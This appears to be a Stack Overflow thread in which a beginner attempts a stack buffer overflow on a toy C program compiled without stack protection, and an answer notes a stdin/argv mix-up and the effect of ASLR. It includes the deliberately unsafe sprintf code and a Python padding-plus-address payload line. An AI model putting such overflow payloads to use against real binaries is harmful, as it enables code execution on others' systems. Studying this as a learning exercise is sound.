-3

Following this: How can I exploit a buffer overflow?

I have a code compiled using -fno-stack-protector:

#include <stdio.h>

void shellcode(){
    printf("\n Reached shellcode!");
}

int main(int argc, char **argv){
    char buf[3];
    sprintf(buf, "%s", argv[1]);
    return 0;
}

but unable to execute the shellcode function.

Like in that post i am using:

python -c 'print "A"*27+"\x49\x11\x00\x00\x00\x00\x00\x00"' > input

./a < input

Get a segfault at:

./a 12345678901
Segmentation fault (core dumped)

but nothing happens.

my main goal is to execute ls on linux os instead of shellcode function. but right now nothing works.

code0x00
  • 543
  • 3
  • 18

1 Answers1

0

There are two potential problems here:

  1. By using sprintf(.., argv[1]), you seem to be expecting input from argv. But ./a < input directs the file to STDIN

  2. ASLR could screw your exploit up. Meaning that you don't know if the address is correct.

It's very difficult to answer such questions without having the binary (a) itself, or at least the Makefile.

If I were you, I would work with a debugger (GDB is great) until the exploit works. But it's worth noting that with ASLR, it would be tough.

malkaroee
  • 187
  • 1
  • 6
  • (Tangentially, saving a temporary input in a file is a very un-Unixy thing to do; use a pipe or a command substitution.) – tripleee May 17 '22 at 09:21
  • @malkaroee Just starting to learn about sec, could you please tell what should i look particularly in gdb? – code0x00 May 20 '22 at 17:12